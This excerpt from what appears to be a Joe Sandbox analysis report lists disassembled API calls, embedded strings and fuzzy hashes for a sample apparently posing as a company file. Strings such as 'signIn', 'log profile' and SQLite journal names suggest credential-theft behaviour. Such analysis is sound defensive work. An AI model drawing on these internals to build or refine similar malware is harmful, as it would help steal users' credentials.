                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 59245283-0
                                                                                                    • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                    • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                    • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                                                                                    • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                    • GetLastError.KERNEL32 ref: 0041855C
                                                                                                    • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                    • GetLastError.KERNEL32 ref: 0041858E
                                                                                                    • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                    • free.MSVCRT ref: 004185AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2802642348-0
                                                                                                    • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                    • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                    • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                    • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                    • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                    • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                    • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                    • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                    • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                    • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                    APIs
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                    • memset.MSVCRT ref: 00413ADC
                                                                                                    • memset.MSVCRT ref: 00413AEC
                                                                                                      • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                    • memset.MSVCRT ref: 00413BD7
                                                                                                    • wcscpy.MSVCRT ref: 00413BF8
                                                                                                    • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                    • String ID: 3A
                                                                                                    • API String ID: 3300951397-293699754
                                                                                                    • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                    • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                    • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                    • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                    • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                    • String ID: strings
                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                    • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                    • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                    • API String ID: 776488737-1622828088
                                                                                                    • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                    • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                    • String ID: sysdatetimepick32
                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                    • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                    • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: -journal$-wal
                                                                                                    • API String ID: 438689982-2894717839
                                                                                                    • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                    • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3975816621-0
                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                    APIs
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                    • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                    • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                    • memset.MSVCRT ref: 00405E33
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                    • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2313361498-0
                                                                                                    • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                    • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                                                    • String ID:
                                                                                                    • API String ID: 2047574939-0
                                                                                                    • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                    • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                    APIs
                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 4218492932-0
                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                    APIs
                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 438689982-4203073231
                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                    • API String ID: 3510742995-2446657581
                                                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
